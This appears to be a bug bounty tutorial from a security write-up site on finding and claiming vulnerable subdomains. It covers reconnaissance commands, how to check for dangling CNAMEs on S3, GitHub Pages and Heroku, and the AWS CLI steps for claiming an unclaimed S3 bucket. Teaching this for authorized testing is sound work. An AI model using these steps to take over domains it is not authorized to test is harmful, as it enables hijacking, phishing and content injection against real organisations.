$100-$1000 Worth Subdomain Takeover | Easy Bounty Methodology | by It4chis3c | Apr, 2025 | InfoSec Write-ups

AI Summary Hide AI Generated Summary

Step-by-Step Subdomain Takeover Process

This guide details how to identify and exploit subdomain takeover vulnerabilities, a common bug bounty target. The process is divided into three main steps.

Step 1: Reconnaissance

Begin by collecting subdomains using tools like subfinder and amass. The output is then filtered to identify potential errors, focusing on common cloud providers.

  • Look for NoSuchBucket errors (AWS S3).
  • Check for 404 There isn't a GitHub Pages site here errors (GitHub Pages).
  • Identify No such app errors (Heroku).

The dnsx tool helps filter results based on potential vulnerabilities.

Step 2: Verification and Filtering

Not all errors indicate exploitable vulnerabilities. It's crucial to filter out false positives.

  • Check for Dangling CNAMEs: Verify if a CNAME points to a non-existent service (e.g., Heroku app).
  • Avoid False Positives: Use the can-i-take-over-xyz tool to determine if a service is truly claimable (avoiding services like Shopify that return 404 but aren't vulnerable).

Step 3: Claiming the Subdomain (AWS S3 Example)

The article uses an AWS S3 example to illustrate the claiming process.

  • Find an interesting CNAME: Identify a subdomain pointing to an AWS S3 bucket.
  • Check bucket existence: Use the aws s3 ls command. A NoSuchBucket error confirms the vulnerability.
  • Create and populate the bucket: Create the bucket and upload a proof-of-concept to claim the subdomain.
Sign in to unlock more AI features Sign in with Google

Practical & Step-by-Step guide to find Subdomain Takeover Vulnerability

Friend Link | Free Link

Hi geeks, it4chis3c (Twitter) came-up with another bounty earning write-up in the Bug Bounty Hunting Series:

Credit: Gemini | Imagen 3

Step-by-Step Process

Step 1: Recon

Collect subdomains (you can use more tools if you want to discover more subdomains)

subfinder -d example.com -silent | anew subs.txt  amass enum -passive -d example.com | anew subs.txt

Errors to look for majorly:

AWS S3: NoSuchBucket error in response.

GitHub Pages: 404 There isn't a GitHub Pages site here.

Heroku: No such app error.

cat subs.txt | dnsx -cname -resp | grep -iE 's3|github|heroku' > cnames.txt

Step 2: Are all errors really exploitable?

Here’s how I filter:

  1. Check for “dangling” CNAMEs:

If dev.example.com → dev-example.herokuapp.com but Heroku says “No such app”, It’s a vulnerability.

Visit the CNAME directly (e.g., dev-example.herokuapp.com). If it’s dead, you can claim it.

2. Avoid False Positives:

Some services show 404s but aren’t claimable (e.g., Shopify). Use can-i-take-over-xyz to check.

Step 3: Claiming the Subdomain

Let’s use an example: AWS S3 -

  1. Find an interseting CNAME: files.example.com → files.example.com.s3.amazonaws.com.
  2. Check if the bucket exists:
aws s3 ls s3://files.example.com

If you see NoSuchBucket, proceed.

3. Create the bucket and upload a PoC:

aws s3 mb s3://files.example.com …

Was this article displayed correctly? Not happy with what you see?

See Archived Versions
Category: Cybersecurity
Tags: Bug Bounty Subdomain Takeover AWS S3 GitHub Pages Heroku

Share this article with your
friends and colleagues.

Twitter/X
WhatsApp
Facebook

Share this article with your
friends and colleagues.

Twitter/X
WhatsApp
Facebook